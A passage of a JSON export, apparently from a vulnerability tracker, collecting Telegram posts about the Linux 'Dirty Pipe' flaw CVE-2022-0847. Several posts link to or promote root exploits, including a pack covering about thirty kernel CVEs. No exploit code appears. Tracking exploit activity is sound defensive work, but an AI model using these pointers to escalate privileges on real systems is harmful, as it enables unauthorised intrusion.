\u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f.\n01 - CVE-2022-0847 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 \u044f\u0434\u0440\u0430 5.8 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430   \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 5.16.11, 5.15.25 \u0438 5.10.102\n02 - \u043f\u043e\u043b\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0434\u044b\u0440\u044b \u0442\u0443\u0442\n03 - \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0442\u0443\u0442 (2 \u0441\u043f\u043b\u043e\u0438\u0442\u0430: cve.c - \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435, dirtypipe.c - \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c root shell )\n04 -  \u0430 \u0442\u0443\u0442 \u0432\u0438\u0434\u0435\u043e \u043a\u0430\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f cve.c , \u0430 \u0442\u0443\u0442 \u0432\u0438\u0434\u0435\u043e \u043a\u0430\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c dirtypipe.c \n#exploit #linux #LPE", "creation_timestamp": "2022-03-08T13:58:59.000000Z"}, {"uuid": "4f4eaf39-5d92-49b1-b430-5bb7aeb482db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/proxy_bar/830", "content": "Learning Linux kernel exploitation\nPart - 1  Laying the groundwork\nPart - 2  CVE-2022-0847\n\n#linux #kernel #exploit", "creation_timestamp": "2022-05-11T21:17:17.000000Z"}, {"uuid": "b708d354-a160-4c5c-b321-70d6d39d7c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/896", "content": "Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)\n\u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0447\u0442\u043e\\\u043a\u0430\u043a\\\u0437\u0430\u0447\u0435\u043c\\\u043f\u043e_\u0447\u0451\u043c\n\n#vuln", "creation_timestamp": "2022-06-30T09:59:57.000000Z"}, {"uuid": "53b593cf-87f3-4c4e-a644-f1bae519d8e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/JlSv_tusg96tcn2i5vran-Oez6CWLeJXc8Qf92DyuqxrpA", "content": "", "creation_timestamp": "2022-03-10T01:03:29.000000Z"}, {"uuid": "09b8b926-b676-4365-9b02-386d2930857b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1427", "content": "kernel-linux-factory\n*\n\u0423\u0434\u043e\u0431\u043d\u043e \u0442\u0435\u043c, \u0447\u0442\u043e \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043b\u0438 \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0442\u044c \u0441\u0440\u0435\u0434\u0443, \u0433\u043b\u044f\u043d\u0443\u043b \u043a\u0430\u043a\u043e\u0435 \u044f\u0434\u0440\u043e, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b \u0441\u043f\u043b\u043e\u0435\u0442, \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043f\u043e \u043c\u043e\u0440\u0434\u0435 #root\n*\n\u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 exploits \u0434\u043b\u044f:\nCVE-2016-9793\n4-20-BPF-integer\nCVE-2017-5123\nCVE-2017-6074\nCVE-2017-7308\nCVE-2017-8890\nCVE-2017-11176\nCVE-2017-16995\nCVE-2017-1000112\nCVE-2018-5333\nCVE-2019-9213 & CVE-2019-8956\nCVE-2019-15666\nCVE-2020-8835\nCVE-2020-27194\nCVE-2021-3156\nCVE-2021-31440\nCVE-2021-3490\nCVE-2021-22555\nCVE-2021-41073\nCVE-2021-4154\nCVE-2021-42008\nCVE-2021-43267\nCVE-2022-0185\nCVE-2022-0847\nCVE-2022-0995\nCVE-2022-1015\nCVE-2022-2588\nCVE-2022-2639\nCVE-2022-25636\nCVE-2022-27666\nCVE-2022-32250\nCVE-2022-34918\n\ndownload\n\n#linux #exploits #kernel", "creation_timestamp": "2023-03-23T06:30:43.000000Z"}, {"uuid": "dcc4a37c-dbac-4860-bac7-5b3b19e2c10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/mD180Uuo9NmNp1_XfoMsxqDUsZVs6sECIXAgLbVaH-nEwQ", "content": "", "creation_timestamp": "2022-03-09T11:10:11.000000Z"}, {"uuid": "9190fe30-f231-4814-890a-e803ea164a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/XMwDvTLAmhWga5QwuMgdpyHKKnO4UvruTYk2rtrABRl7Mw", "content": "", "creation_timestamp": "2022-07-07T16:58:51.000000Z"}, {"uuid": "e9c05d46-2221-4517-858f-a7810c4313a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/iKmCXDjc860wxk4zSJoXdc3HmROqpxh089VwNDIZi8rgYw", "content": "", "creation_timestamp": "2022-06-30T09:59:23.000000Z"}, {"uuid": "31b24b2d-4cb2-4949-8a05-ab3dd40fbedf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/I-hU3G5QSlqq1eT8BGoJCaI7CM0HEZwsEJWXyFsBrThbRA", "content": "", "creation_timestamp": "2022-05-12T08:57:05.000000Z"}, {"uuid": "e81490e0-4561-4e42-a9f6-b45ce88a5341", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "exploited", "source": "https://t.me/true_secator/6124", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0437\u0430 \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2024 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043d\u0430\u0441\u044b\u0449\u0435\u043d\u043d\u044b\u043c \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a \u0438 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u0412 \u043d\u043e\u0432\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0440\u0435\u0437\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n\u041e\u0431\u0449\u0435\u0435 \u0447\u0438\u0441\u043b\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u0440\u0435\u0432\u044b\u0441\u0438\u043b\u043e \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0439 \u043f\u0435\u0440\u0438\u043e\u0434 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044f \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430.\n\n\u0414\u043e\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441 PoC \u0438 \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u0445\u0441\u044f \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0437\u0438\u043b\u0430\u0441\u044c \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e 2023 \u0433\u043e\u0434\u0430. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e \u0442\u0438\u043f\u0443 \u043f\u043e\u0434\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043e\u0442\u0441\u0442\u043e\u044f\u0442\u0441\u044f \u043a \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c.\n\n\u0422\u0430\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a \u0447\u0438\u0441\u043b\u0443 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u041f\u041e \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c: \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0431\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0447\u0435\u0440\u0435\u0437 VPN, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c\u0438 \u0438 IoT-\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u041b\u041a, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0434\u043b\u044f Windows \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0440\u0430\u0441\u0442\u0438 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0440\u0430\u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043f\u0443\u0442\u0435\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u041a \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Microsoft Office (CVE-2018-0802, CVE-2017-11882\u00a0, CVE-2017-0199\u00a0 \u0438 CVE-2021-40444\u00a0).\n\n\u041d\u0430\u0431\u0438\u0440\u0430\u044e\u0449\u0430\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 Linux \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0440\u043e\u0441\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u0432 \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0432\u0435\u0441 Windows \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u044f\u0434\u0440\u043e (CVE-2022-0847, CVE-2023-2640 \u0438 CVE-2021-4034), \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f EoP.\n\n\u0422\u043e\u043f-10 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0432 APT-\u0430\u0442\u0430\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u00a0\u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430, \u043d\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e-\u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0442\u0435\u0445 \u0436\u0435 \u0442\u0438\u043f\u043e\u0432: \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0440\u0430\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043e\u0444\u0438\u0441\u043d\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f.\n\n\u0411\u043e\u043b\u044c\u0448\u043e\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Bring You Own Vulnerable Driver (BYOVD). \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0441\u0432\u0435\u0436\u0435\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0435 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n2023 \u0433\u043e\u0434 \u0441\u0442\u0430\u043b \u0441\u0430\u043c\u044b\u043c \u0431\u043e\u0433\u0430\u0442\u044b\u043c \u043d\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c BYOVD. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2024-\u0433\u043e \u0438\u0445 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u044c\u0448\u0435, \u0447\u0435\u043c \u0437\u0430 2021 \u0438 2022 \u0433\u043e\u0434\u044b, \u0432\u043c\u0435\u0441\u0442\u0435 \u0432\u0437\u044f\u0442\u044b\u0435. \u0412\u0442\u043e\u0440\u043e\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0441\u044f \u0440\u043e\u0441\u0442\u043e\u043c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f.\n\n\u041d\u0430\u0433\u043b\u044f\u0434\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2024 \u0433\u043e\u0434\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2024-08-22T19:40:05.000000Z"}, {"uuid": "7179896f-8eb6-406d-a7fa-5e0ed75cc7c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityIL/10596", "content": "\u05d7\u05d5\u05dc\u05e9\u05ea \u05d0\u05d1\u05d8\u05d7\u05ea \u05de\u05d9\u05d3\u05e2 \u05d7\u05d3\u05e9\u05d4 \u05d1\u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05e4\u05d5\u05e8\u05e1\u05de\u05d4 \u05e2\"\u05d9 \u05d7\u05d5\u05e7\u05e8 \u05d0\u05d1\u05d8\"\u05de, \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05e7\u05d1\u05dc\u05ea \u05d4\u05e8\u05e9\u05d0\u05d5\u05ea Root \u05d5\u05e2\u05d5\u05d3.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4, \u05e9\u05e7\u05d9\u05d1\u05dc\u05d4 \u05d0\u05ea \u05d4\u05e9\u05dd Dirty Pipe, \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05d1\u05e2\u05dc\u05d9 \u05d4\u05e8\u05e9\u05d0\u05d5\u05ea \u05e8\u05d2\u05d9\u05dc\u05d5\u05ea \u05dc\u05e9\u05e0\u05d5\u05ea \u05e0\u05ea\u05d5\u05e0\u05d9\u05dd \u05d1\u05e7\u05d1\u05e6\u05d9\u05dd \u05de\u05d5\u05d2\u05e0\u05d9\u05dd \u05d5\u05d1\u05d0\u05de\u05e6\u05e2\u05d5\u05ea \u05db\u05da \u05dc\u05d4\u05e9\u05d9\u05d2 \u05d0\u05e3 \u05d4\u05e8\u05e9\u05d0\u05d5\u05ea Root \u05e2\u05dc \u05d4\u05de\u05db\u05d5\u05e0\u05d4.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 (CVE-2022-0847) \u05de\u05e9\u05e4\u05d9\u05e2\u05d4 \u05e2\u05dc \u05db\u05dc \u05d2\u05e8\u05e1\u05d0\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05d4\u05e2\u05d5\u05e9\u05d5\u05ea \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1-Linux Kernel 5.8 \u05d5\u05de\u05e2\u05dc\u05d4 (\u05db\u05d5\u05dc\u05dc \u05de\u05db\u05e9\u05d9\u05e8\u05d9 \u05d0\u05e0\u05d3\u05e8\u05d5\u05d0\u05d9\u05d3), \u05ea\u05d9\u05e7\u05d5\u05df \u05d4\u05d5\u05e4\u05e5 \u05d1\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea 5.16.11, 5.15.25, \u05d5- 5.10.102.\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea\n\nhttps://t.me/CyberSecurityIL/1756\n\nhttps://www.bleepingcomputer.com/news/security/new-linux-bug-gives-root-on-all-major-distros-exploit-released/", "creation_timestamp": "2022-03-08T12:59:53.000000Z"}, {"uuid": "764e6a46-956f-4f4a-8f7f-a111092f75f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1216", "content": "Automatic Linux privesc exploitation\n\n#CVE-2021-3560 #CVE-2021-4034 #CVE-2022-0847\n#Linux #privesc #exploitation #PrivilegeEscalation\n#vulnerabilities #root #shell #Exploit #Hacking\n\nhttps://reconshell.com/automatic-linux-privesc-exploitation/", "creation_timestamp": "2022-03-12T19:48:01.000000Z"}, {"uuid": "113e1dd0-1993-496a-aba5-2250c86a0b13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "exploited", "source": "https://t.me/RalfHackerChannel/1181", "content": "CVE-2022-0847: Linux Kernel LPE (\"Dirty Pipe\")\n\nhttps://github.com/antx-code/CVE-2022-0847\n\n#git #exploit #pentest", "creation_timestamp": "2022-05-31T08:01:56.000000Z"}, {"uuid": "bad1e3e9-0342-4c4a-aa37-75e45f83ed6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1212", "content": "CVE-2022-0847 DirtyPipe Root Exploit\n\n#Exploit #DirtyPipe #CVE-2022-0847 #shell #VAPT\n#Hacking #Bugbounty #vulnerability #DirtyCow\n\nhttps://reconshell.com/cve-2022-0847-dirtypipe-root-exploit/", "creation_timestamp": "2022-03-08T09:17:12.000000Z"}, {"uuid": "4dd9675e-00ea-429d-941e-4ace39be5154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/1LaCaUCbmonhUsdLXDrlotMFovHRkoWhnk68vbQAJuyX02k", "content": "", "creation_timestamp": "2022-04-24T16:38:02.000000Z"}, {"uuid": "a7a94f25-ce92-42f3-979b-31295ba9bbf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 